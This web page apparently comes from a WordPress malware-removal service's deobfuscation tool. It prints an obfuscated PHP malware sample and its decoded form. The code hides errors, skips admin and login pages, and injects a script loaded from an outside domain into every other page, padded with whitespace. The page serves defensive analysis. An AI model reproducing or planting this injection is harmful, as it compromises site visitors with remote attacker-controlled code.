Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $a="err"./*1*/"or_repor"./*1*/"ting";$a(0);$a="dis"./*2*/"play"./*2*/"_er"."rors";ini_set($a,0);$a="ba"."s"./*2*/"e6"./*2*/"4_de"./*2*/"co"./*2*/"de"; $at = ''.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'';$v=0; if(strpos($at,$a('L3dwLWFkbWlu'))!==false){$v=1;} if(strpos($at,'/wp-login.p...



Obfuscated php code

<?php $a="err"./*1*/"or_repor"./*1*/"ting";$a(0);$a="dis"./*2*/"play"./*2*/"_er"."rors";ini_set($a,0);$a="ba"."s"./*2*/"e6"./*2*/"4_de"./*2*/"co"./*2*/"de"; $at = ''.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'';$v=0;  if(strpos($at,$a('L3dwLWFkbWlu'))!==false){$v=1;}   if(strpos($at,'/wp-login.php')!==false){$v=1;}  if(strpos($at,'wp-json')!==false){$v=1;} if(strpos($at,'rest_route')!==false){$v=1;}if($v==0){$n=chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(32).chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(119).chr(97).chr(121).chr(46).chr(115).chr(112).chr(101).chr(99).chr(105).chr(97).chr(108).chr(98).chr(108).chr(117).chr(101).chr(105).chr(116).chr(101).chr(109).chr(115).chr(46).chr(99).chr(111).chr(109).chr(47).chr(115).chr(114).chr(99).chr(47).chr(109).chr(97).chr(105).chr(110).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(49).chr(46).chr(48).chr(46).chr(49).chr(39).chr(32).chr(97).chr(115).chr(121).chr(110).chr(99).chr(61).chr(39).chr(116).chr(114).chr(117).chr(101).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62);echo $n;}

Decoded(de-Obfuscated) php code

<?php

$a = "error_reporting";
error_reporting(0);
$a = "display_errors";
ini_set($a, 0);
$a = "base64_decode";
$at = '' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'] . '';
$v = 0;
if (strpos($at, "/wp-admin") !== false) {
    $v = 1;
}
if (strpos($at, '/wp-login.php') !== false) {
    $v = 1;
}
if (strpos($at, 'wp-json') !== false) {
    $v = 1;
}
if (strpos($at, 'rest_route') !== false) {
    $v = 1;
}
if ($v == 0) {
    $n = "                                                                                                                                                                                                                                                                             <script type='text/javascript' src='https://way.specialblueitems.com/src/main.js?v=1.0.1' async='true'></script>";
    echo $n;
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.